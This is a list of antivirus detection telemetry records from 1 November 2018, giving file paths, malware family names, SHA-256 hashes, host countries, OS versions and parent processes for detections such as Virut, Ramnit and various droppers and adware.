  Row(detection=Row(filename='avscan-20181101-124147-844d8398', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181101-124126-71F36FB4\\AVSCAN-20181101-124147-844D8398', filesize=20000, name='PUA/Linkury.Gen2.#M300.#R101296'), hash='9d728e799087184abed77f070f3fdee4fd9fae622bf93bcfa4744be9dfaf89e9', metadata=Row(cmdline=None, country='ES', os_name='Windows', os_vmajor='6', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T11:41:48Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='spic.vir', filepath='\\\\?\\C:\\Program Files (x86)\\Justified\\spic.VIR', filesize=384000, name='HEUR/AGEN.1029347.#M1.#R1'), hash='ca23ef36c43d02666fa97ca6e35451e5d9937aab0f778200aad1f8d7a2736b7e', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T16:07:32Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='setup.exe', filepath='C:\\Users\\X\\Downloads\\Files\\Setup.exe', filesize=55424000, name='HEUR/AGEN.1032309.#M1.#R1'), hash='aa681078e0e7772a97f51dacaf6e880ae82f39b1979b302e90aff452ebac2f73', metadata=Row(cmdline=None, country='CO', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=4312752, timestamp='2018-11-01T00:04:29Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='igfxcfg.exe', filepath='I:\\Driver\\899_drivers\\Intel\\I945GM\\Vga\\Windrv\\win2000\\igfxcfg.exe', filesize=512000, name='W32/Ramnit.CD.#M1.#R1'), hash='5a61e2397de06f5d9a9f5d0488dddc88208bdef09664728bc8762214213e1d08', metadata=Row(cmdline=None, country='A1', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Google\\Chrome\\Application\\chrome.exe', parentsize=1378648, timestamp='2018-11-01T12:07:32Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='\\\\?\\C:\\Windows\\winsxs\\x86_windowssearchengine_31bf3856ad364e35_7.0.7601.21720_none_75dc5a4092e0dcc7\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='8b90e3e508cce54c4e83097a770130c2ca1eed46c0ba74ee84880654a00f48c5', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T11:34:01Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='vbscript.exe', filepath='c:\\program files (x86)\\otter32\\vbscript.exe', filesize=896000, name='HEUR/APC.#M1.#R1'), hash='5cae4d902e2d11f0980df6844ecb2606dd2fb0916bd5f744bddd933201d262de', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\msiexec.exe', parentsize=73216, timestamp='2018-11-01T17:44:48Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='csrss.exe', filepath='C:\\ProgramData\\Microsoft\\WmiAppSrv\\csrss.exe', filesize=1344000, name='TR/Crypt.FKM.Gen.#M300.#R581'), hash='6f85c3cad16c4f9e490f240c57448bdd12310c0bc11f4f9231440daefe81237e', metadata=Row(cmdline=None, country='VE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\ProgramData\\WmiAppSrv\\svchost.exe', parentsize=1057792, timestamp='2018-11-01T21:13:08Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='85c502f0cd2c224a2c99ee96bae85f09afb2443cc19e5defef72abde35b1dc87', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_28.10.2018-5.available\\Avira\\85C502F0CD2C224A2C99EE96BAE85F09AFB2443CC19E5DEFEF72ABDE35B1DC87', filesize=448000, name='W32/Ramnit.CD.#M1.#R1'), hash='85c502f0cd2c224a2c99ee96bae85f09afb2443cc19e5defef72abde35b1dc87', metadata=Row(cmdline='\\\\\\"D:\\\\\\\\TotalAutomation\\\\\\\\Avira1.4.py\\\\\\" ', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Python27\\python.exe', parentsize=26624, timestamp='2018-11-01T11:30:38Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='crack.exe', filepath='C:\\Program Files (x86)\\The_Secret_0.1.2.2\\crack\\crack.exe', filesize=7936000, name='TR/Crypt.TPM.Gen.#M300.#R2977'), hash='77c91e39fd62c026c8a45d51bc5f65370b38bc1bffc700fae82bada75dbcfba6', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='US', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-01T01:43:26Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-161617-f165ed24', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_2cd1ddcd\\AVSCAN-20181101-161148-D5525E98\\AVSCAN-20181101-161617-F165ED24', filesize=1664000, name='TR/ATRAPS.Gen4.#M1.#R1'), hash='17a47a4fed25a13302f4391b35f928a044058cb35562ff1487f269af32f3a1a3', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:16:13Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-194910-b423121f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6a27c5c9\\AVSCAN-20181101-194803-A89BA1A8\\AVSCAN-20181101-194910-B423121F', filesize=64000, name='TR/Siggen.rioid.#M1.#R1'), hash='5d45044066fc94a1558c3717b1bab84d8cfc17b7603b888168b9571f1b2b414e', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T17:49:12Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='a0001146.exe', filepath='\\\\?\\G:\\System Volume Information\\_restore{C55BB417-5842-42AE-ADE1-F67D4C7D69A5}\\RP5\\A0001146.exe', filesize=110208000, name='W32/Virut.Gen.#M1.#R1'), hash='5211146b308fa9bc7c0543cdece22d90e27b511867104a3fd5ed02bc6db8f3a8', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T23:11:57Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='wap.exe', filepath='c:\\program files (x86)\\prokaward\\wap.exe', filesize=4096000, name='SPR/Tool.AwardKeylogger.93.#M1.#R1'), hash='6b0c812488381b7c768741c139ab6bbca0ac260d6775cd552e354bf93925224f', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\ProKAward\\rsasws.exe', parentsize=98304, timestamp='2018-11-01T21:04:30Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='msimg32.dll', filepath='C:\\Users\\X\\Desktop\\Setup\\msimg32.dll', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\Desktop\\Setup\\Setup.exe', parentsize=1551000, timestamp='2018-11-01T17:06:09Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='mshta.exe', filepath='\\\\?\\C:\\Windows\\System32\\mshta.exe', filesize=64000, name='W32/Virut.Gen.#M1.#R1'), hash='4c9c09885d6c35cbb5dcaccb219359e6564d57d20c82ede932a2673004536170', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T15:30:21Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='msimg32.dll', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\Temp1_Setup.zip\\msimg32.dll', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Users\\X\\AppData\\Local\\Temp\\Temp1_Setup.zip\\Setup.exe', parentsize=1551000, timestamp='2018-11-01T18:53:25Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='savepass 1.1-bho64.dll', filepath='\\\\?\\C:\\Program Files (x86)\\SavePass 1.1\\SavePass 1.1-bho64.dll', filesize=940000, name='ADWARE/CrossRider.Gen.#M300.#R5892'), hash='15ee2676c95b45800892ec5873aee229893ff4d19cfd133f2e8e02683b37e2c7', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-01T15:05:16Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-111316-7703febb', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_0995b4dc\\AVSCAN-20181101-111213-6F13FB26\\AVSCAN-20181101-111316-7703FEBB', filesize=1152000, name='HEUR/APC.#M1.#R1'), hash='3606a529040d3201d305e1624f739663c2341bb5e04965ee9c8636bf67a55c93', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T10:13:16Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='ue32.exe', filepath='\\\\?\\K:\\الموبيل\\2007\\2006\\New Folder (3)\\صور on 10.10.10.2\\Images\\New Folder (2)\\new foldar\\Norton.AntiVirus.2003.v9.0.Professional.Real.Final.Retail\\AdvTools\\UE32.EXE', filesize=512000, name='W32/Sality.Patched.#M1.#R1'), hash='3ee59d568621261420d37f41e45aa2a4bfe246a5caafbd1070362d13a8da18d9', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T16:22:08Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='2668.exe', filepath='\\\\NSHNRPTR\\scan\\2668.exe', filesize=640000, name='TR/Dropper.Gen.#M300.#R3873'), hash='0f07d20c1d9cf096d6c7dff1d49e70c95d28885c09443210d45dc71ac32c23b4', metadata=Row(cmdline=None, country='KW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2872320, timestamp='2018-11-01T05:23:22Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181102-002414-43da3510', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_8b7397db\\AVSCAN-20181102-002012-29AB3F0F\\AVSCAN-20181102-002414-43DA3510', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='578d39ad2094181562e84cc0f0ef7a99aef1f27a5e537651d45dee406006b474', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T17:24:21Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='23682066ff16205715fe0965362f1f41e3d9b53bca40f9b1f530d14c8c6c1782', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_30.10.2018-21.categorizing\\23682066FF16205715FE0965362F1F41E3D9B53BCA40F9B1F530D14C8C6C1782', filesize=300000, name='TR/ATRAPS.Gen2.#M300.#R100252'), hash='23682066ff16205715fe0965362f1f41e3d9b53bca40f9b1f530d14c8c6c1782', metadata=Row(cmdline='-r', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Kaspersky Lab\\Kaspersky Internet Security 18.0.0\\avp.exe', parentsize=354672, timestamp='2018-11-01T06:54:56Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-01T17:56:39Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181102-003100-6fe5a779', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_8b7397db\\AVSCAN-20181102-001743-196A0AE8\\AVSCAN-20181102-003100-6FE5A779', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='578d39ad2094181562e84cc0f0ef7a99aef1f27a5e537651d45dee406006b474', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T17:31:07Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='a0127409.exe', filepath='\\?\\H:\\System Volume Information\\_restore{FD8CA95C-615B-4BD2-B142-4564B27DDB35}\\RP2\\A0127409.EXE', filesize=64000, name='W32/Virut.Gen.#M1.#R1'), hash='08f001bff3c666a6f70c117695c9e6c1d7d58659e5e5c351f6c7ca204eca8718', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T22:46:55Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='jp2launcher.exe', filepath='\\\\?\\E:\\trash\\moafaq 8-11-2016\\source\\desktop2014\\my documents\\Downloads\\Programs\\Java\\x64\\jre6\\bin\\jp2launcher.exe', filesize=256000, name='W64/Infector.Gen.#M300.#R8089'), hash='5b69787a82cd872e14f26c5e9637feed74f022300a15f440d6f041fa6e29f2ab', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T16:55:26Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-01T15:41:18Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='msimg32.dll', filepath='C:\\Users\\X\\Downloads\\Setup\\msimg32.dll', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Users\\X\\Downloads\\Setup\\Setup.exe', parentsize=1551000, timestamp='2018-11-01T21:35:52Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-01T14:58:31Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181102-002428-4556dfa9', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_8b7397db\\AVSCAN-20181102-001743-196A0AE8\\AVSCAN-20181102-002428-4556DFA9', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='578d39ad2094181562e84cc0f0ef7a99aef1f27a5e537651d45dee406006b474', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T17:24:34Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-233812-06c03a2a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_4dd5a4c9\\AVSCAN-20181101-233753-03DA62A2\\AVSCAN-20181101-233812-06C03A2A', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T16:38:11Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-070526-fa8bd86e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_328b17cb\\AVSCAN-20181101-070503-F741C32E\\AVSCAN-20181101-070526-FA8BD86E', filesize=512000, name='TR/Crypt.ZPACK.Gen2.100871.#M1.#R1'), hash='5d15c8a10de097152559adebf4acac95b4b9b6fbc2fe0670157a1d57b05e38d9', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T06:05:24Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-194533-420eeeee', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181101-194206-2B30998F\\AVSCAN-20181101-194533-420EEEEE', filesize=9216000, name='TR/Strictor.mvpk.#M1.#R1'), hash='d242860cabdb5fcd0bfeeba7e64751f2a37387615fe06bf7c65c0a39b3a1ef08', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T18:45:36Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-090917-467d5931', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_32396741\\AVSCAN-20181101-090721-3440003D\\AVSCAN-20181101-090917-467D5931', filesize=896000, name='PUA/InstallCore.#M1.#R1'), hash='dcd335936e7fd1dba32881dcff49de018a24583a88ba6f4d7b1592ab9f7983b3', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T09:09:17Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='856be68c7c35950ec82cb025ae25eda6d534bd29b349cedcab036dfa22c3d18e', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-35\\856BE68C7C35950EC82CB025AE25EDA6D534BD29B349CEDCAB036DFA22C3D18E', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='856be68c7c35950ec82cb025ae25eda6d534bd29b349cedcab036dfa22c3d18e', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T16:15:34Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='d79597210450249b741f49074b5cfaa5c40278f3638e0d7a3f4c6eec7b986f22.vir', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_27.10.2018-17.available\\Avira\\D79597210450249B741F49074B5CFAA5C40278F3638E0D7A3F4C6EEC7B986F22.VIR', filesize=104000, name='HEUR/AGEN.1032151.#M1.#R1'), hash='d79597210450249b741f49074b5cfaa5c40278f3638e0d7a3f4c6eec7b986f22', metadata=Row(cmdline='\\\\\\"D:\\\\\\\\TotalAutomation\\\\\\\\Avira1.4.py\\\\\\" ', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Python27\\python.exe', parentsize=26624, timestamp='2018-11-01T09:12:37Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='cc275.bat', filepath='C:\\Program Files\\Simplo\\Correias\\CC275.bat', filesize=512000, name='HEUR/AGEN.1020558.#M1.#R1'), hash='d74903e9aa711b7871a09b98fdb3d39dacf10853d030ad15aa8c6281a6dc62de', metadata=Row(cmdline='aepdu.dll,AePduRunUpdate', country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\rundll32.exe', parentsize=44544, timestamp='2018-11-01T03:34:47Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='wuauclt.exe', filepath='C:\\Windows\\System32\\wuauclt.exe', filesize=64000, name='W32/Virut.Gen.#M1.#R1'), hash='a3f9ab0c635a33655bba901c055526b8745b86fab8b1dcafd7b343464bfce157', metadata=Row(cmdline='-k netsvcs', country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-01T05:40:58Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='qoizfldc.exe', filepath='G:\\Files are hidden by Trojan\\RECYCLER\\S-0-7-08-8026522526-7122263011-714661711-6462\\qOIZfLdc.exe', filesize=128000, name='W32/Virut.Gen.#M1.#R1'), hash='bb6eff6c9655c890f0d38ddcffbed35c70e720cd1b4e90472e23ff251161108c', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-01T11:04:09Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='setup337.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\fl43xdwuvuw\\Setup337.exe', filesize=1472000, name='TR/Dropper.MSIL.Gen.#M300.#R5304'), hash='d4db4d74240a34b066207a80080cadd428136c7dd2b8b60d08d42f7559f37e4e', metadata=Row(cmdline='2 3.1540912029.5bd8739d3b7a5', country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\Emtak\\214531731.exe', parentsize=670720, timestamp='2018-11-01T15:22:27Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='b454707979a453226ea1a212be0aa21c5c2fa5a2b73c6834157cf7d5e0f90636', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_30.10.2018-19.categorizing\\B454707979A453226EA1A212BE0AA21C5C2FA5A2B73C6834157CF7D5E0F90636', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='b454707979a453226ea1a212be0aa21c5c2fa5a2b73c6834157cf7d5e0f90636', metadata=Row(cmdline='-r', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Kaspersky Lab\\Kaspersky Internet Security 18.0.0\\avp.exe', parentsize=354672, timestamp='2018-11-01T07:48:38Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-213529-53a6f267', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_de0729a5\\AVSCAN-20181101-211656-B20B1D6E\\AVSCAN-20181101-213529-53A6F267', filesize=576000, name='TR/Dldr.Stantinko.be854f.#M1.#R1'), hash='be854f2a34ba3f398eb409c41f271270079bbd139e4bdd0f203b071e09ea0b3d', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T18:35:51Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='setup337.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\1uogrpi3pgs\\Setup337.exe', filesize=1472000, name='TR/Dropper.MSIL.Gen.#M300.#R5304'), hash='d4db4d74240a34b066207a80080cadd428136c7dd2b8b60d08d42f7559f37e4e', metadata=Row(cmdline='2 3.1541047614.5bda853e876ec', country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Backs\\701317936.exe', parentsize=671232, timestamp='2018-11-01T12:34:26Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='install_flash_player_13_plugin.exe', filepath='C:\\Users\\X\\Desktop\\2018nasties\\install_flash_player_13_plugin.exe', filesize=7232000, name='HEUR/AGEN.1014567.#M1.#R1'), hash='cdd589e4299501dafddd9901450b24b6103ef55cc6496ee13a813585379d5f58', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:KH0jjft2e06Zvdij.1', country='US', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-01T07:47:47Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='fusion.dll', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\nsz6CB8.tmp\\Fusion.dll', filesize=896000, name='PUA/InstallCore.#M1.#R1'), hash='dcd335936e7fd1dba32881dcff49de018a24583a88ba6f4d7b1592ab9f7983b3', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\Downloads\\Fotor3_3.4.0(162.18)_win32_x64.exe', parentsize=268366931, timestamp='2018-11-01T03:20:51Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='project work presentazione.exe', filepath='E:\\Didattica\\Sgb\\condivisa\\SORZI\\TUTTO STORICO\\CHIAVETTA TESI\\MASTER\\Project work PRESENTAZIONE.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='dbbba6122f8e506938da13a7b6a38c765c4600d8db1ef90d90e2c97600adb0b1', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T20:19:58Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-093550-9b8b1de5', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_318d9040\\AVSCAN-20181101-093330-80B14946\\AVSCAN-20181101-093550-9B8B1DE5', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='d9d8fcfcdf53b63ec7a8dfd24a2086e31f8c19e146ac30e3af30e293c84fa17b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T02:35:57Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-145756-74926565', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3db4e496\\AVSCAN-20181101-145735-7096FD0F\\AVSCAN-20181101-145756-74926565', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='d9d8fcfcdf53b63ec7a8dfd24a2086e31f8c19e146ac30e3af30e293c84fa17b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:58:02Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='-_-____------_____-_-_-_----_---____--_-__-_-_----_-____---__.-_-____------_____-_-_-_----_---____--_-__-_-_----_-____---__', filepath='G:\\\xa0\\Files\\\xa0\\Files\\\xa0\\Files\\\xa0\\Files\\\xa0\\-_-____------_____-_-_-_----_---____--_-__-_-_----_-____---__.-_-____------_____-_-_-_----_---____--_-__-_-_----_-____---__', filesize=6516000, name='WORM/Lodbak.Gen4.#M300.#R300496'), hash='e3f098cccf34c24b21469c20b7763bdd8b3a7a97f65617f4338c5dfe905e1ac7', metadata=Row(cmdline=None, country='JO', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T17:19:11Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='ace2cb691c408b678d2822c52779dcc258a16751518803e086ce31f1f13e2b13', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchIndexer.exe', parentsize=455168, timestamp='2018-11-01T09:42:01Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='setup.exe', filepath='C:\\Program Files\\InstallShield Installation Information\\{9899B8B5-C656-4816-903C-29C4185BF674}\\setup.exe', filesize=512000, name='W32/Ramnit.CD.#M1.#R1'), hash='8c2da0482680dbd488a83bff78066b4652194f51d3dd57a5e74b5600c6e66904', metadata=Row(cmdline='\\\\\\/F \\\\\\/T \\\\\\/R', country='TR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\wbem\\WMIADAP.exe', parentsize=115200, timestamp='2018-11-01T10:11:06Z'), dt=datetime.date(2018, 11, 1)),
